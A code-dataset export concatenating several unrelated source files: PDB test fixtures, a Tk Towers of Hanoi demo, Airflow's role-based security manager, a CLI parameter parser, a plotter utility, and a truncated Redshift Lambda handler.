ATOM 3 C CYS A 27 16.236 6.026 11.467 1.00 14.53 C
ATOM 4 O CYS A 27 15.254 6.760 11.351 1.00 16.95 O
ATOM 5 CB CYS A 27 17.114 6.698 13.662 1.00 15.77 C
ATOM 6 SG CYS A 27 17.230 6.332 15.443 1.00 17.57 S
ATOM 7 HA CYS A 27 15.739 5.186 13.237 1.00 14.57 H
ATOM 8 HB2 CYS A 27 16.526 7.461 13.549 1.00 15.77 H
ATOM 9 HB3 CYS A 27 18.003 6.913 13.340 1.00 15.77 H
ATOM 10 CB CYS A 123 14.607 7.591 16.260 1.00 24.16 C
ATOM 11 SG CYS A 123 15.316 5.939 15.946 1.00 20.05 S
ATOM 12 N ACYS A 123 15.023 7.279 18.624 0.58 26.40 N
ATOM 14 CA ACYS A 123 15.266 8.190 17.491 0.58 25.69 C
ATOM 15 C ACYS A 123 14.764 9.599 17.776 0.58 26.33 C
ATOM 16 O ACYS A 123 14.197 10.238 16.886 0.58 28.70 O
ATOM 17 OXTACYS A 123 14.975 10.081 18.878 0.58 28.31 O
ATOM 18 HA ACYS A 123 16.217 8.287 17.324 0.58 25.69 H
ATOM 19 HB2ACYS A 123 13.652 7.502 16.408 1.00 24.16 H
ATOM 20 HB3ACYS A 123 14.772 8.157 15.490 1.00 24.16 H
ATOM 22 N BCYS A 123 15.023 7.288 18.685 0.42 25.68 N
ATOM 23 CA BCYS A 123 15.108 8.205 17.548 0.42 25.86 C
ATOM 24 C BCYS A 123 14.270 9.460 17.813 0.42 26.42 C
ATOM 26 O BCYS A 123 13.915 10.125 16.837 0.42 27.75 O
ATOM 27 OXTBCYS A 123 13.981 9.728 18.968 0.42 28.04 O
ATOM 28 HA BCYS A 123 16.045 8.426 17.432 0.42 25.86 H
ATOM 29 HB2BCYS A 123 13.642 7.500 16.307 1.00 24.16 H
ATOM 30 HB3BCYS A 123 14.850 8.168 15.519 1.00 24.16 H
'''
pdb_str_009 = '''
REMARK 1KYC: SIN is linked to GLU 1, but at end of model file
CRYST1 19.769 30.000 32.270 90.00 90.00 90.00 P 1
ATOM 1 N GLU A 1 9.100 10.903 6.846 1.00 18.32 N
ATOM 2 CA GLU A 1 8.321 10.315 7.917 1.00 16.97 C
ATOM 3 C GLU A 1 9.162 9.612 8.973 1.00 15.25 C
ATOM 4 O GLU A 1 8.910 9.774 10.170 1.00 14.23 O
ATOM 5 CB GLU A 1 7.291 9.304 7.380 1.00 17.54 C
ATOM 6 CG GLU A 1 6.485 8.581 8.454 1.00 19.79 C
ATOM 7 CD GLU A 1 5.488 9.479 9.156 1.00 20.81 C
ATOM 8 OE1 GLU A 1 5.000 10.445 8.534 1.00 23.39 O
ATOM 9 OE2 GLU A 1 5.180 9.223 10.333 1.00 21.60 O
ATOM 10 HA GLU A 1 7.863 11.056 8.343 1.00 16.97 H
ATOM 11 HB2 GLU A 1 6.662 9.777 6.812 1.00 17.54 H
ATOM 12 HB3 GLU A 1 7.761 8.630 6.865 1.00 17.54 H
ATOM 13 HG2 GLU A 1 7.094 8.232 9.123 1.00 19.79 H
ATOM 14 HG3 GLU A 1 5.993 7.854 8.042 1.00 19.79 H
ATOM 15 N GLU A 2 10.111 8.769 8.574 1.00 15.28 N
ATOM 16 CA GLU A 2 10.916 8.018 9.519 1.00 14.99 C
ATOM 17 C GLU A 2 11.541 8.882 10.615 1.00 13.85 C
ATOM 18 O GLU A 2 11.362 8.667 11.822 1.00 13.88 O
ATOM 19 CB GLU A 2 12.024 7.270 8.757 1.00 16.20 C
ATOM 20 CG GLU A 2 12.869 6.426 9.713 1.00 17.22 C
ATOM 21 CD GLU A 2 14.152 5.903 9.124 1.00 17.43 C
ATOM 22 OE1 GLU A 2 14.556 6.396 8.052 1.00 18.62 O
ATOM 23 OE2 GLU A 2 14.769 5.000 9.734 1.00 17.26 O
ATOM 24 H GLU A 2 10.307 8.616 7.751 1.00 15.28 H
ATOM 25 HA GLU A 2 10.334 7.388 9.972 1.00 14.99 H
ATOM 26 HB2 GLU A 2 12.604 7.912 8.318 1.00 16.20 H
ATOM 27 HB3 GLU A 2 11.622 6.681 8.099 1.00 16.20 H
ATOM 28 HG2 GLU A 2 13.101 6.970 10.482 1.00 17.22 H
ATOM 29 HG3 GLU A 2 12.344 5.661 9.995 1.00 17.22 H
HETATM 30 O1 SO4 A 101 11.629 25.000 26.048 0.50 20.11 O
HETATM 31 O2 SO4 A 101 10.541 22.822 26.297 0.50 21.85 O
HETATM 32 O3 SO4 A 101 9.524 24.537 24.875 0.50 20.45 O
HETATM 33 O4 SO4 A 101 9.520 24.852 27.270 0.50 19.22 O
HETATM 34 S SO4 A 101 10.313 24.291 26.126 0.50 19.91 S
HETATM 35 C1 SIN A 0 10.126 11.723 7.051 1.00 19.39 C
HETATM 36 C2 SIN A 0 10.828 12.260 5.817 1.00 21.62 C
HETATM 37 C3 SIN A 0 11.448 13.629 6.056 1.00 22.69 C
HETATM 38 C4 SIN A 0 10.468 14.784 6.095 1.00 23.92 C
HETATM 39 O1 SIN A 0 10.519 11.999 8.189 1.00 19.91 O
HETATM 40 O3 SIN A 0 10.949 15.933 6.216 1.00 24.14 O
HETATM 41 O4 SIN A 0 9.264 14.547 6.337 1.00 25.37 O
HETATM 42 H21 SIN A 0 10.110 12.330 5.000 1.00 21.62 H
HETATM 43 H22 SIN A 0 11.609 11.561 5.518 1.00 21.62 H
HETATM 44 H31 SIN A 0 11.985 13.602 7.004 1.00 22.69 H
HETATM 45 H32 SIN A 0 12.173 13.820 5.265 1.00 22.69 H
'''
if (__name__ == "__main__"):
t0 = time.time()
run()
print("OK. Time: %8.3f"%(time.time()-t0))
| 58.639752
| 85
| 0.482841
|
4a0207ef42bdf2c818189af5f0e3be20407f4545
| 4,765
|
py
|
Python
|
my-electron-app/src/components/python_terminal/python/Tools/demo/hanoi.py
|
diesisfox/ECE496
|
9864bfe2426d1f7e94776f63e3e477f37798754f
|
[
"MIT"
] | 1
|
2021-01-09T14:48:12.000Z
|
2021-01-09T14:48:12.000Z
|
Tools/demo/hanoi.py
|
Krrishdhaneja/cpython
|
9ae9ad8ba35cdcece7ded73cd2207e4f8cb85578
|
[
"0BSD"
] | 1
|
2021-02-24T02:25:12.000Z
|
2021-02-24T02:25:12.000Z
|
my-electron-app/src/components/python_terminal/python/Tools/demo/hanoi.py
|
diesisfox/ECE496
|
9864bfe2426d1f7e94776f63e3e477f37798754f
|
[
"MIT"
] | 1
|
2022-03-28T19:28:45.000Z
|
2022-03-28T19:28:45.000Z
|
#!/usr/bin/env python3
"""
Animated Towers of Hanoi using Tk with optional bitmap file in background.
Usage: hanoi.py [n [bitmapfile]]
n is the number of pieces to animate; default is 4, maximum 15.
The bitmap file can be any X11 bitmap file (look in /usr/include/X11/bitmaps for
samples); it is displayed as the background of the animation. Default is no
bitmap.
"""
from tkinter import Tk, Canvas
# Basic Towers-of-Hanoi algorithm: move n pieces from a to b, using c
# as temporary. For each move, call report()
def hanoi(n, a, b, c, report):
if n <= 0: return
hanoi(n-1, a, c, b, report)
report(n, a, b)
hanoi(n-1, c, b, a, report)
# The graphical interface
class Tkhanoi:
# Create our objects
def __init__(self, n, bitmap=None):
self.n = n
self.tk = tk = Tk()
self.canvas = c = Canvas(tk)
c.pack()
width, height = tk.getint(c['width']), tk.getint(c['height'])
# Add background bitmap
if bitmap:
self.bitmap = c.create_bitmap(width//2, height//2,
bitmap=bitmap,
foreground='blue')
# Generate pegs
pegwidth = 10
pegheight = height//2
pegdist = width//3
x1, y1 = (pegdist-pegwidth)//2, height*1//3
x2, y2 = x1+pegwidth, y1+pegheight
self.pegs = []
p = c.create_rectangle(x1, y1, x2, y2, fill='black')
self.pegs.append(p)
x1, x2 = x1+pegdist, x2+pegdist
p = c.create_rectangle(x1, y1, x2, y2, fill='black')
self.pegs.append(p)
x1, x2 = x1+pegdist, x2+pegdist
p = c.create_rectangle(x1, y1, x2, y2, fill='black')
self.pegs.append(p)
self.tk.update()
# Generate pieces
pieceheight = pegheight//16
maxpiecewidth = pegdist*2//3
minpiecewidth = 2*pegwidth
self.pegstate = [[], [], []]
self.pieces = {}
x1, y1 = (pegdist-maxpiecewidth)//2, y2-pieceheight-2
x2, y2 = x1+maxpiecewidth, y1+pieceheight
dx = (maxpiecewidth-minpiecewidth) // (2*max(1, n-1))
for i in range(n, 0, -1):
p = c.create_rectangle(x1, y1, x2, y2, fill='red')
self.pieces[i] = p
self.pegstate[0].append(i)
x1, x2 = x1 + dx, x2-dx
y1, y2 = y1 - pieceheight-2, y2-pieceheight-2
self.tk.update()
self.tk.after(25)
# Run -- never returns
def run(self):
while True:
hanoi(self.n, 0, 1, 2, self.report)
hanoi(self.n, 1, 2, 0, self.report)
hanoi(self.n, 2, 0, 1, self.report)
hanoi(self.n, 0, 2, 1, self.report)
hanoi(self.n, 2, 1, 0, self.report)
hanoi(self.n, 1, 0, 2, self.report)
# Reporting callback for the actual hanoi function
def report(self, i, a, b):
if self.pegstate[a][-1] != i: raise RuntimeError # Assertion
del self.pegstate[a][-1]
p = self.pieces[i]
c = self.canvas
# Lift the piece above peg a
ax1, ay1, ax2, ay2 = c.bbox(self.pegs[a])
while True:
x1, y1, x2, y2 = c.bbox(p)
if y2 < ay1: break
c.move(p, 0, -1)
self.tk.update()
# Move it towards peg b
bx1, by1, bx2, by2 = c.bbox(self.pegs[b])
newcenter = (bx1+bx2)//2
while True:
x1, y1, x2, y2 = c.bbox(p)
center = (x1+x2)//2
if center == newcenter: break
if center > newcenter: c.move(p, -1, 0)
else: c.move(p, 1, 0)
self.tk.update()
# Move it down on top of the previous piece
pieceheight = y2-y1
newbottom = by2 - pieceheight*len(self.pegstate[b]) - 2
while True:
x1, y1, x2, y2 = c.bbox(p)
if y2 >= newbottom: break
c.move(p, 0, 1)
self.tk.update()
# Update peg state
self.pegstate[b].append(i)
def main():
import sys
# First argument is number of pegs, default 4
if sys.argv[1:]:
n = int(sys.argv[1])
else:
n = 4
# Second argument is bitmap file, default none
if sys.argv[2:]:
bitmap = sys.argv[2]
# Reverse meaning of leading '@' compared to Tk
if bitmap[0] == '@': bitmap = bitmap[1:]
else: bitmap = '@' + bitmap
else:
bitmap = None
# Create the graphical objects...
h = Tkhanoi(n, bitmap)
# ...and run!
h.run()
# Call main when run as script
if __name__ == '__main__':
main()
| 30.741935
| 81
| 0.516055
|
4a0208045c7af48626b5b9197008b271edb7bd84
| 20,717
|
py
|
Python
|
airflow/www/security.py
|
fxdmhtt/airflow
|
cf88f7bc7bbd3e9bf110e98f025759a96c130235
|
[
"Apache-2.0"
] | 3
|
2016-05-12T07:36:24.000Z
|
2018-08-18T15:04:23.000Z
|
airflow/www/security.py
|
fxdmhtt/airflow
|
cf88f7bc7bbd3e9bf110e98f025759a96c130235
|
[
"Apache-2.0"
] | 3
|
2020-03-08T15:43:38.000Z
|
2021-09-29T17:26:10.000Z
|
airflow/www/security.py
|
upjohnc/airflow-upjohn-k8s
|
caadbc1618d73e054de99138b0892cea3a9327c4
|
[
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"ECL-2.0",
"BSD-3-Clause"
] | 5
|
2017-06-19T19:55:47.000Z
|
2020-10-10T00:49:20.000Z
|
# -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
from flask import g
from flask_appbuilder.security.sqla import models as sqla_models
from flask_appbuilder.security.sqla.manager import SecurityManager
from sqlalchemy import or_
from airflow import models
from airflow.exceptions import AirflowException
from airflow.www.app import appbuilder
from airflow.utils.db import provide_session
from airflow.utils.log.logging_mixin import LoggingMixin
EXISTING_ROLES = {
'Admin',
'Viewer',
'User',
'Op',
'Public',
}
class AirflowSecurityManager(SecurityManager, LoggingMixin):
###########################################################################
# VIEW MENUS
###########################################################################
# [START security_viewer_vms]
VIEWER_VMS = {
'Airflow',
'DagModelView',
'Browse',
'DAG Runs',
'DagRunModelView',
'Task Instances',
'TaskInstanceModelView',
'SLA Misses',
'SlaMissModelView',
'Jobs',
'JobModelView',
'Logs',
'LogModelView',
'Docs',
'Documentation',
'Github',
'About',
'Version',
'VersionView',
}
# [END security_viewer_vms]
USER_VMS = VIEWER_VMS
# [START security_op_vms]
OP_VMS = {
'Admin',
'Configurations',
'ConfigurationView',
'Connections',
'ConnectionModelView',
'Pools',
'PoolModelView',
'Variables',
'VariableModelView',
'XComs',
'XComModelView',
}
# [END security_op_vms]
###########################################################################
# PERMISSIONS
###########################################################################
# [START security_viewer_perms]
VIEWER_PERMS = {
'menu_access',
'can_index',
'can_list',
'can_show',
'can_chart',
'can_dag_stats',
'can_dag_details',
'can_task_stats',
'can_code',
'can_log',
'can_get_logs_with_metadata',
'can_tries',
'can_graph',
'can_tree',
'can_task',
'can_task_instances',
'can_xcom',
'can_gantt',
'can_landing_times',
'can_duration',
'can_blocked',
'can_rendered',
'can_version',
}
# [END security_viewer_perms]
# [START security_user_perms]
USER_PERMS = {
'can_dagrun_clear',
'can_run',
'can_trigger',
'can_add',
'can_edit',
'can_delete',
'can_paused',
'can_refresh',
'can_success',
'muldelete',
'set_failed',
'set_running',
'set_success',
'clear',
'can_clear',
}
# [END security_user_perms]
# [START security_op_perms]
OP_PERMS = {
'can_conf',
'can_varimport',
}
# [END security_op_perms]
# global view-menu for dag-level access
DAG_VMS = {
'all_dags'
}
WRITE_DAG_PERMS = {
'can_dag_edit',
}
READ_DAG_PERMS = {
'can_dag_read',
}
DAG_PERMS = WRITE_DAG_PERMS | READ_DAG_PERMS
###########################################################################
# DEFAULT ROLE CONFIGURATIONS
###########################################################################
ROLE_CONFIGS = [
{
'role': 'Viewer',
'perms': VIEWER_PERMS | READ_DAG_PERMS,
'vms': VIEWER_VMS | DAG_VMS
},
{
'role': 'User',
'perms': VIEWER_PERMS | USER_PERMS | DAG_PERMS,
'vms': VIEWER_VMS | DAG_VMS | USER_VMS,
},
{
'role': 'Op',
'perms': VIEWER_PERMS | USER_PERMS | OP_PERMS | DAG_PERMS,
'vms': VIEWER_VMS | DAG_VMS | USER_VMS | OP_VMS,
},
]
def init_role(self, role_name, role_vms, role_perms):
"""
Initialize the role with the permissions and related view-menus.
:param role_name:
:param role_vms:
:param role_perms:
:return:
"""
pvms = self.get_session.query(sqla_models.PermissionView).all()
pvms = [p for p in pvms if p.permission and p.view_menu]
role = self.find_role(role_name)
if not role:
role = self.add_role(role_name)
if len(role.permissions) == 0:
self.log.info('Initializing permissions for role:%s in the database.', role_name)
role_pvms = set()
for pvm in pvms:
if pvm.view_menu.name in role_vms and pvm.permission.name in role_perms:
role_pvms.add(pvm)
role.permissions = list(role_pvms)
self.get_session.merge(role)
self.get_session.commit()
else:
self.log.debug('Existing permissions for the role:%s '
'within the database will persist.', role_name)
def delete_role(self, role_name):
"""Delete the given Role
:param role_name: the name of a role in the ab_role table
"""
session = self.get_session
role = session.query(sqla_models.Role)\
.filter(sqla_models.Role.name == role_name)\
.first()
if role:
self.log.info("Deleting role '%s'", role_name)
session.delete(role)
session.commit()
else:
raise AirflowException("Role named '{}' does not exist".format(
role_name))
def get_user_roles(self, user=None):
"""
Get all the roles associated with the user.
:param user: the ab_user in FAB model.
:return: a list of roles associated with the user.
"""
if user is None:
user = g.user
if user.is_anonymous:
public_role = appbuilder.config.get('AUTH_ROLE_PUBLIC')
return [appbuilder.security_manager.find_role(public_role)] \
if public_role else []
return user.roles
def get_all_permissions_views(self):
"""
Returns a set of tuples with the perm name and view menu name
"""
perms_views = set()
for role in self.get_user_roles():
perms_views.update({(perm_view.permission.name, perm_view.view_menu.name)
for perm_view in role.permissions})
return perms_views
def get_accessible_dag_ids(self, username=None):
"""
Return a set of dags that user has access to(either read or write).
:param username: Name of the user.
:return: A set of dag ids that the user could access.
"""
if not username:
username = g.user
if username.is_anonymous or 'Public' in username.roles:
# return an empty set if the role is public
return set()
roles = {role.name for role in username.roles}
if {'Admin', 'Viewer', 'User', 'Op'} & roles:
return self.DAG_VMS
user_perms_views = self.get_all_permissions_views()
# return a set of all dags that the user could access
return set([view for perm, view in user_perms_views if perm in self.DAG_PERMS])
def has_access(self, permission, view_name, user=None):
"""
Verify whether a given user could perform certain permission
(e.g can_read, can_write) on the given dag_id.
:param permission: permission on dag_id(e.g can_read, can_edit).
:type permission: str
:param view_name: name of view-menu(e.g dag id is a view-menu as well).
:type view_name: str
:param user: user name
:type user: str
:return: a bool whether user could perform certain permission on the dag_id.
:rtype bool
"""
if not user:
user = g.user
if user.is_anonymous:
return self.is_item_public(permission, view_name)
return self._has_view_access(user, permission, view_name)
def _get_and_cache_perms(self):
"""
Cache permissions-views
"""
self.perms = self.get_all_permissions_views()
def _has_role(self, role_name_or_list):
"""
Whether the user has this role name
"""
if not isinstance(role_name_or_list, list):
role_name_or_list = [role_name_or_list]
return any(
[r.name in role_name_or_list for r in self.get_user_roles()])
def _has_perm(self, permission_name, view_menu_name):
"""
Whether the user has this perm
"""
if hasattr(self, 'perms'):
if (permission_name, view_menu_name) in self.perms:
return True
# rebuild the permissions set
self._get_and_cache_perms()
return (permission_name, view_menu_name) in self.perms
def has_all_dags_access(self):
"""
Has all the dag access in any of the 3 cases:
1. Role needs to be in (Admin, Viewer, User, Op).
2. Has can_dag_read permission on all_dags view.
3. Has can_dag_edit permission on all_dags view.
"""
return (
self._has_role(['Admin', 'Viewer', 'Op', 'User']) or
self._has_perm('can_dag_read', 'all_dags') or
self._has_perm('can_dag_edit', 'all_dags'))
def clean_perms(self):
"""
FAB leaves faulty permissions that need to be cleaned up
"""
self.log.debug('Cleaning faulty perms')
sesh = self.get_session
pvms = (
sesh.query(sqla_models.PermissionView)
.filter(or_(
sqla_models.PermissionView.permission == None, # noqa pylint: disable=singleton-comparison
sqla_models.PermissionView.view_menu == None, # noqa pylint: disable=singleton-comparison
))
)
deleted_count = pvms.delete()
sesh.commit()
if deleted_count:
self.log.info('Deleted %s faulty permissions', deleted_count)
def _merge_perm(self, permission_name, view_menu_name):
"""
Add the new permission , view_menu to ab_permission_view_role if not exists.
It will add the related entry to ab_permission
and ab_view_menu two meta tables as well.
:param permission_name: Name of the permission.
:type permission_name: str
:param view_menu_name: Name of the view-menu
:type view_menu_name: str
:return:
"""
permission = self.find_permission(permission_name)
view_menu = self.find_view_menu(view_menu_name)
pv = None
if permission and view_menu:
pv = self.get_session.query(self.permissionview_model).filter_by(
permission=permission, view_menu=view_menu).first()
if not pv and permission_name and view_menu_name:
self.add_permission_view_menu(permission_name, view_menu_name)
@provide_session
def create_custom_dag_permission_view(self, session=None):
"""
Workflow:
1. Fetch all the existing (permissions, view-menu) from Airflow DB.
2. Fetch all the existing dag models that are either active or paused. Exclude the subdags.
3. Create both read and write permission view-menus relation for every dags from step 2
4. Find out all the dag specific roles(excluded pubic, admin, viewer, op, user)
5. Get all the permission-vm owned by the user role.
6. Grant all the user role's permission-vm except the all-dag view-menus to the dag roles.
7. Commit the updated permission-vm-role into db
:return: None.
"""
self.log.debug('Fetching a set of all permission, view_menu from FAB meta-table')
def merge_pv(perm, view_menu):
"""Create permission view menu only if it doesn't exist"""
if view_menu and perm and (view_menu, perm) not in all_pvs:
self._merge_perm(perm, view_menu)
all_pvs = set()
for pv in self.get_session.query(self.permissionview_model).all():
if pv.permission and pv.view_menu:
all_pvs.add((pv.permission.name, pv.view_menu.name))
# Get all the active / paused dags and insert them into a set
all_dags_models = session.query(models.DagModel)\
.filter(or_(models.DagModel.is_active, models.DagModel.is_paused))\
.filter(~models.DagModel.is_subdag).all()
# create can_dag_edit and can_dag_read permissions for every dag(vm)
for dag in all_dags_models:
for perm in self.DAG_PERMS:
merge_pv(perm, dag.dag_id)
# for all the dag-level role, add the permission of viewer
# with the dag view to ab_permission_view
all_roles = self.get_all_roles()
user_role = self.find_role('User')
dag_role = [role for role in all_roles if role.name not in EXISTING_ROLES]
update_perm_views = []
# need to remove all_dag vm from all the existing view-menus
dag_vm = self.find_view_menu('all_dags')
ab_perm_view_role = sqla_models.assoc_permissionview_role
perm_view = self.permissionview_model
view_menu = self.viewmenu_model
all_perm_view_by_user = session.query(ab_perm_view_role)\
.join(perm_view, perm_view.id == ab_perm_view_role
.columns.permission_view_id)\
.filter(ab_perm_view_role.columns.role_id == user_role.id)\
.join(view_menu)\
.filter(perm_view.view_menu_id != dag_vm.id)
all_perm_views = set([role.permission_view_id for role in all_perm_view_by_user])
for role in dag_role:
# Get all the perm-view of the role
existing_perm_view_by_user = self.get_session.query(ab_perm_view_role)\
.filter(ab_perm_view_role.columns.role_id == role.id)
existing_perms_views = set([pv.permission_view_id
for pv in existing_perm_view_by_user])
missing_perm_views = all_perm_views - existing_perms_views
for perm_view_id in missing_perm_views:
update_perm_views.append({'permission_view_id': perm_view_id,
'role_id': role.id})
if update_perm_views:
self.get_session.execute(ab_perm_view_role.insert(), update_perm_views)
self.get_session.commit()
def update_admin_perm_view(self):
"""
Admin should have all the permission-views.
Add the missing ones to the table for admin.
:return: None.
"""
pvms = self.get_session.query(sqla_models.PermissionView).all()
pvms = [p for p in pvms if p.permission and p.view_menu]
admin = self.find_role('Admin')
admin.permissions = list(set(admin.permissions) | set(pvms))
self.get_session.commit()
def sync_roles(self):
"""
1. Init the default role(Admin, Viewer, User, Op, public)
with related permissions.
2. Init the custom role(dag-user) with related permissions.
:return: None.
"""
self.log.debug('Start syncing user roles.')
# Create global all-dag VM
self.create_perm_vm_for_all_dag()
# Create default user role.
for config in self.ROLE_CONFIGS:
role = config['role']
vms = config['vms']
perms = config['perms']
self.init_role(role, vms, perms)
self.create_custom_dag_permission_view()
# init existing roles, the rest role could be created through UI.
self.update_admin_perm_view()
self.clean_perms()
def sync_perm_for_dag(self, dag_id, access_control=None):
"""
Sync permissions for given dag id. The dag id surely exists in our dag bag
as only / refresh button or cli.sync_perm will call this function
:param dag_id: the ID of the DAG whose permissions should be updated
:type dag_id: string
:param access_control: a dict where each key is a rolename and
each value is a set() of permission names (e.g.,
{'can_dag_read'}
:type access_control: dict
:return:
"""
for dag_perm in self.DAG_PERMS:
perm_on_dag = self.find_permission_view_menu(dag_perm, dag_id)
if perm_on_dag is None:
self.add_permission_view_menu(dag_perm, dag_id)
if access_control:
self._sync_dag_view_permissions(dag_id, access_control)
def _sync_dag_view_permissions(self, dag_id, access_control):
"""Set the access policy on the given DAG's ViewModel.
:param dag_id: the ID of the DAG whose permissions should be updated
:type dag_id: string
:param access_control: a dict where each key is a rolename and
each value is a set() of permission names (e.g.,
{'can_dag_read'}
:type access_control: dict
"""
def _get_or_create_dag_permission(perm_name):
dag_perm = self.find_permission_view_menu(perm_name, dag_id)
if not dag_perm:
self.log.info(
"Creating new permission '%s' on view '%s'",
perm_name, dag_id
)
dag_perm = self.add_permission_view_menu(perm_name, dag_id)
return dag_perm
def _revoke_stale_permissions(dag_view):
existing_dag_perms = self.find_permissions_view_menu(dag_view)
for perm in existing_dag_perms:
non_admin_roles = [role for role in perm.role
if role.name != 'Admin']
for role in non_admin_roles:
target_perms_for_role = access_control.get(role.name, {})
if perm.permission.name not in target_perms_for_role:
self.log.info(
"Revoking '%s' on DAG '%s' for role '%s'",
perm.permission, dag_id, role.name
)
self.del_permission_role(role, perm)
dag_view = self.find_view_menu(dag_id)
if dag_view:
_revoke_stale_permissions(dag_view)
for rolename, perms in access_control.items():
role = self.find_role(rolename)
if not role:
raise AirflowException(
"The access_control mapping for DAG '{}' includes a role "
"named '{}', but that role does not exist".format(
dag_id,
rolename))
perms = set(perms)
invalid_perms = perms - self.DAG_PERMS
if invalid_perms:
raise AirflowException(
"The access_control map for DAG '{}' includes the following "
"invalid permissions: {}; The set of valid permissions "
"is: {}".format(dag_id,
(perms - self.DAG_PERMS),
self.DAG_PERMS))
for perm_name in perms:
dag_perm = _get_or_create_dag_permission(perm_name)
self.add_permission_role(role, dag_perm)
def create_perm_vm_for_all_dag(self):
"""
Create perm-vm if not exist and insert into FAB security model for all-dags.
"""
# create perm for global logical dag
for dag_vm in self.DAG_VMS:
for perm in self.DAG_PERMS:
self._merge_perm(permission_name=perm,
view_menu_name=dag_vm)
| 35.780656
| 107
| 0.582179
|
4a020958ce0637920478a7644e63de6df263eec7
| 2,271
|
py
|
Python
|
faculty_cli/parse.py
|
ASIDataScience/faculty-cli
|
9acbac4d6a84ba0728ad8ef1ea03045ad966e5fb
|
[
"Apache-2.0"
] | 3
|
2019-01-21T13:42:31.000Z
|
2019-01-30T15:31:23.000Z
|
faculty_cli/parse.py
|
ASIDataScience/faculty-cli
|
9acbac4d6a84ba0728ad8ef1ea03045ad966e5fb
|
[
"Apache-2.0"
] | 2
|
2019-01-23T13:40:44.000Z
|
2019-01-30T12:17:42.000Z
|
faculty_cli/parse.py
|
ASIDataScience/faculty-cli
|
9acbac4d6a84ba0728ad8ef1ea03045ad966e5fb
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2016-2022 Faculty Science Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from collections import namedtuple
ESCAPE_CHAR = "\\"
RunIdentifier = namedtuple("RunIdentifier", ["run_number", "subrun_number"])
def parse_run_identifier(string):
try:
parts = tuple(map(int, string.split(".", 2)))
except ValueError:
raise ValueError("Invalid run identifier: {}".format(string))
if len(parts) == 1:
return RunIdentifier(parts[0], None)
elif len(parts) == 2:
return RunIdentifier(*parts)
else:
raise ValueError("Invalid run identifier: {}".format(string))
def _escape_split(string, delimiter):
escape_mode = False
chunk = ""
parts = []
for character in string:
if character == ESCAPE_CHAR:
escape_mode = True
continue
if escape_mode:
if character == delimiter:
chunk += character
else:
chunk += ESCAPE_CHAR + character
escape_mode = False
else:
if character == delimiter:
parts.append(chunk)
chunk = ""
else:
chunk += character
parts.append(chunk)
return parts
def parse_parameter_values(parameter_value_string):
"""Parse a parameter value string from the CLI and return as a dict."""
parts = _escape_split(parameter_value_string, ",")
parameter_values = {}
for part in parts:
if part.strip() == "":
continue
try:
name, value = _escape_split(part, "=")
except ValueError:
raise ValueError("Invalid parameter value: {}".format(part))
parameter_values[name] = value
return parameter_values
| 29.115385
| 76
| 0.632321
|
4a020a327eb6648b8b5737634b2d7a1fedc35572
| 1,777
|
py
|
Python
|
eleksdrawpy/util.py
|
basjacobs93/xy
|
7f9bbd089e29785eb905567aa4a0aac25c650ebd
|
[
"MIT"
] | 4
|
2020-05-09T21:34:06.000Z
|
2022-02-14T18:05:09.000Z
|
eleksdrawpy/util.py
|
basjacobs93/xy
|
7f9bbd089e29785eb905567aa4a0aac25c650ebd
|
[
"MIT"
] | null | null | null |
eleksdrawpy/util.py
|
basjacobs93/xy
|
7f9bbd089e29785eb905567aa4a0aac25c650ebd
|
[
"MIT"
] | null | null | null |
from .device import Device
from .drawing import Drawing
from shapely.geometry import LineString
import math
from .progress import Bar
import time
def simplify(points, tolerance=0.05):
if len(points) < 2:
return points
line = LineString(points)
line = line.simplify(tolerance)
return list(line.coords)
def simplify_paths(paths, tolerance=0.05):
return [simplify(x, tolerance) for x in paths]
def join_paths(paths, tolerance=0.05):
if len(paths) < 2:
return paths
result = [list(paths[0])]
for path in paths[1:]:
x1, y1 = result[-1][-1]
x2, y2 = path[0]
d = math.hypot(x2 - x1, y2 - y1)
if d <= tolerance:
result[-1].extend(path)
else:
result.append(list(path))
return result
def remove_duplicates(paths):
result = []
seen = set()
for path in paths:
key = tuple((x, y) for x, y in path)
if key in seen:
continue
seen.add(key)
result.append(path)
return result
def draw(x, tolerance=0.05, verbose = False):
if isinstance(x, Drawing):
x = x.paths
device = Device(verbose)
time.sleep(2)
device.pen_up()
time.sleep(1)
device.home()
bar = Bar()
for path in bar(x):
if tolerance:
path = simplify(path, tolerance)
device.draw(path)
def parse_svg_path(line):
paths = []
path = []
for token in line.split():
cmd = token[0].upper()
x, y = map(float, token[1:].split(','))
if cmd == 'M':
if len(path) > 1:
paths.append(path)
path = [(x, y)]
elif cmd == 'L':
path.append((x, y))
if len(path) > 1:
paths.append(path)
return paths
| 24.680556
| 50
| 0.558244
|
4a020c7fb035fe9f39bf947f05a987b91a921891
| 732
|
py
|
Python
|
lambda/get_statement_result/index.py
|
aws-samples/redshift-data-api-with-step-functions-sample
|
288bc3c4f3300d50d266aa9a23a998cdb9f5dbcb
|
[
"MIT-0"
] | 7
|
2021-07-16T04:48:58.000Z
|
2021-11-08T21:09:12.000Z
|
lambda/get_statement_result/index.py
|
aws-samples/redshift-data-api-with-step-functions-sample
|
288bc3c4f3300d50d266aa9a23a998cdb9f5dbcb
|
[
"MIT-0"
] | null | null | null |
lambda/get_statement_result/index.py
|
aws-samples/redshift-data-api-with-step-functions-sample
|
288bc3c4f3300d50d266aa9a23a998cdb9f5dbcb
|
[
"MIT-0"
] | 2
|
2021-09-24T02:19:35.000Z
|
2021-10-25T00:38:40.000Z
|
import logging
import boto3
import time
logger = logging.getLogger()
logger.setLevel(logging.INFO)
rs_data = boto3.client("redshift-data")
def handler(event, context):
logger.info('Event: %s', event)
statement_id = event["statementId"]
results = []
